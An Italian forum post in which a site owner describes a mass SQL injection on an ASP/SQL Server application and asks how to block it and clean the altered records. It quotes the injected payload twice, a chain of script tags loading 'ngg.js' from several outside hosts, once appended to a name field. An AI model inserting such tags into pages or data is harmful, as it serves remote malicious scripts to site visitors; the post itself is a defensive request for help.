Ciao a tutti, aprendo un'aplicazione in asp che tutto a un tratto non funzionava più.
Mi sono accorto che il db sqlserver è pieno di record che sono stati aggiornati con questa riga:
ho visto che il problema è dovuto a sql injection.Codice PHP:<script src=http://www.gitporg.com/ngg.js></script><script src=http://www.adwnetw.com/ngg.js></script><script src=http://www.adpzo.com/ngg.js></script><script src=http://www.tctcow.com/ngg.js></script><script src=http://www.bnrc.ru/ngg.js></script><script src=http://www.cgt4.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script><script src=http://www.kr92.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script>
risporto un link trovato su google
http://www.easynavigate.com/
casomai può servir a qualcuno!!!!!
CIoè delle istruzioni lanciate in querystring alla pagina che mi aggionarno il database.
E volevo sapere come avete risolto per questo prblema e se almeno a qualcuno è capitato o sono l'unico sfigato.
Di sicuro ci sarà un controllo sulle varibili.... (almeno per mysql è così....) ma per asp?
E poi secondo voi come posso lanciare una query che mi pulisca questi record visto che nel campo congome posso avere tipo:
grazie mille dell'aiuto.Codice PHP:Mario Rossi<script src=http://www.gitporg.com/ngg.js></script><script src=http://www.adwnetw.com/ngg.js></script><script src=http://www.adpzo.com/ngg.js></script><script src=http://www.tctcow.com/ngg.js></script><script src=http://www.bnrc.ru/ngg.js></script><script src=http://www.cgt4.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script><script src=http://www.kr92.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script>
Una buona serata
Rispondi quotando